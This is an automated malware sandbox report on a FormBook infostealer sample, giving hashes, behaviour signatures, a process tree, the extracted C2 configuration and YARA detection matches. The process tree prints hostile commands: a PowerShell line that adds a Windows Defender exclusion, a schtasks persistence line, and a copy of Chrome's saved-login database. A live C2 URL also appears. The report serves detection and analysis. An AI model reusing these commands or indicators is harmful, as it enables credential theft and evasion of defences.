Edit tour

Windows Analysis Report
iuvRyl9i7D

Overview

General Information

Sample Name:	iuvRyl9i7D (renamed file extension from none to exe)
Analysis ID:	626605
MD5:	f7ecd12d134aaf3541396c78337ce672
SHA1:	bb41a84d4f5eef537e41cf4bde375c99bff86a04
SHA256:	ec2f5710fdf33c7b843829ebd9f088b15141b643b4354dd92d39b6e290ceca70
Tags:	32exetrojan
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Sample uses process hollowing technique

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

.NET source code contains method to dynamically call methods (often used by packers)

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Adds a directory exclusion to Windows Defender

Uses schtasks.exe or at.exe to add and modify task schedules

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

iuvRyl9i7D.exe (PID: 4928 cmdline: "C:\Users\user\Desktop\iuvRyl9i7D.exe" MD5: F7ECD12D134AAF3541396C78337CE672)

powershell.exe (PID: 6568 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 6640 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp280F.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

iuvRyl9i7D.exe (PID: 6804 cmdline: C:\Users\user\Desktop\iuvRyl9i7D.exe MD5: F7ECD12D134AAF3541396C78337CE672)

iuvRyl9i7D.exe (PID: 6932 cmdline: C:\Users\user\Desktop\iuvRyl9i7D.exe MD5: F7ECD12D134AAF3541396C78337CE672)

explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

control.exe (PID: 6628 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)

cmd.exe (PID: 3984 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.admincost.com/n6g4/"], "decoy": ["bw589jumpb.xyz", "lojas-marias.com", "gadgersvip.com", "zeavd.com", "moment4miracles.com", "wildcanetours.com", "executivetravelandlogistics.com", "uspplongee.com", "schilova.online", "smoothie-optics.com", "masterima.net", "kickball.site", "theastralark.com", "nick-sylvestro.com", "properscooter.com", "wave-thermodynamics.com", "bitcollide.com", "xed5555.com", "tsue-sangyo.com", "lucianaejoaoalberto.com", "6084pinelake.info", "plentyhearty.com", "findmylostphone.me", "cliffpassphotographyllc.com", "goddessboi.com", "vulkan-platinum-online.info", "jumpn-giveaway.online", "linymar.xyz", "topgir.site", "oifreunion.com", "lewks.beauty", "servellobody.com", "eagle-five.com", "agelessfish.com", "daulat-kantorbahasamalut.com", "zombarias.com", "chimneyrepairbiloxi.com", "starline-pools.com", "financeenovationinc.com", "sakvoyge.online", "46458.pet", "babyminer.xyz", "alcosto.club", "aeroyogabrasil.com", "cellphstudy.com", "bldh45.xyz", "sguoffcampusrentals.com", "nehalooks.com", "employeebnsf.com", "duniacuan.online", "running-diary.site", "o-taguro.com", "iacli.run", "cariniclinicalconsulting.com", "btcspay.xyz", "funaoka-watanabedent.com", "jamesreadtanusa.com", "dems-clicks.com", "dowsuserc.top", "joseikinmadoguchi.com", "hulizb6.com", "luxurybathshowers.com", "kapamilla.com", "duowb.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.296276978.0000000002D71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x6345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x5df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x6447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x65bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x8809:$sqlite3step: 68 34 1C 7B E1 0x891c:$sqlite3step: 68 34 1C 7B E1 0x8838:$sqlite3text: 68 38 2A 90 C5 0x895d:$sqlite3text: 68 38 2A 90 C5 0x884b:$sqlite3blob: 68 53 D8 7F 8C 0x8973:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x6345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x5df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x6447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x65bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x8809:$sqlite3step: 68 34 1C 7B E1 0x891c:$sqlite3step: 68 34 1C 7B E1 0x8838:$sqlite3text: 68 38 2A 90 C5 0x895d:$sqlite3text: 68 38 2A 90 C5 0x884b:$sqlite3blob: 68 53 D8 7F 8C 0x8973:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xd82d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd8672:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1030f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x103492:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12cf18:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12d2b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xe5a15:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x110835:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13a655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xe54c1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1102e1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13a101:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xe5b17:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x110937:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13a757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xe5c8f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x110aaf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x13a8cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xd908a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x103eaa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dcca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xe7ed9:$sqlite3step: 68 34 1C 7B E1 0xe7fec:$sqlite3step: 68 34 1C 7B E1 0x112cf9:$sqlite3step: 68 34 1C 7B E1 0x112e0c:$sqlite3step: 68 34 1C 7B E1 0x13cb19:$sqlite3step: 68 34 1C 7B E1 0x13cc2c:$sqlite3step: 68 34 1C 7B E1 0xe7f08:$sqlite3text: 68 38 2A 90 C5 0xe802d:$sqlite3text: 68 38 2A 90 C5 0x112d28:$sqlite3text: 68 38 2A 90 C5 0x112e4d:$sqlite3text: 68 38 2A 90 C5 0x13cb48:$sqlite3text: 68 38 2A 90 C5 0x13cc6d:$sqlite3text: 68 38 2A 90 C5 0xe7f1b:$sqlite3blob: 68 53 D8 7F 8C 0xe8043:$sqlite3blob: 68 53 D8 7F 8C 0x112d3b:$sqlite3blob: 68 53 D8 7F 8C 0x112e63:$sqlite3blob: 68 53 D8 7F 8C 0x13cb5b:$sqlite3blob: 68 53 D8 7F 8C 0x13cc83:$sqlite3blob: 68 53 D8 7F 8C
00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: iuvRyl9i7D.exe PID: 4928	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.0.iuvRyl9i7D.exe.400000.8.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
12.0.iuvRyl9i7D.exe.400000.8.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x81a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14ff1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x157bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x8bba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1426c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9932:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bc9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
12.0.iuvRyl9i7D.exe.400000.8.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a09:$sqlite3step: 68 34 1C 7B E1 0x17b1c:$sqlite3step: 68 34 1C 7B E1 0x17a38:$sqlite3text: 68 38 2A 90 C5 0x17b5d:$sqlite3text: 68 38 2A 90 C5 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
12.0.iuvRyl9i7D.exe.400000.6.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
12.0.iuvRyl9i7D.exe.400000.6.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
12.0.iuvRyl9i7D.exe.400000.6.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
12.0.iuvRyl9i7D.exe.400000.4.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
12.0.iuvRyl9i7D.exe.400000.4.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x81a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14ff1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x157bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x8bba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1426c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9932:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bc9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
12.0.iuvRyl9i7D.exe.400000.4.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a09:$sqlite3step: 68 34 1C 7B E1 0x17b1c:$sqlite3step: 68 34 1C 7B E1 0x17a38:$sqlite3text: 68 38 2A 90 C5 0x17b5d:$sqlite3text: 68 38 2A 90 C5 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
12.0.iuvRyl9i7D.exe.400000.8.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
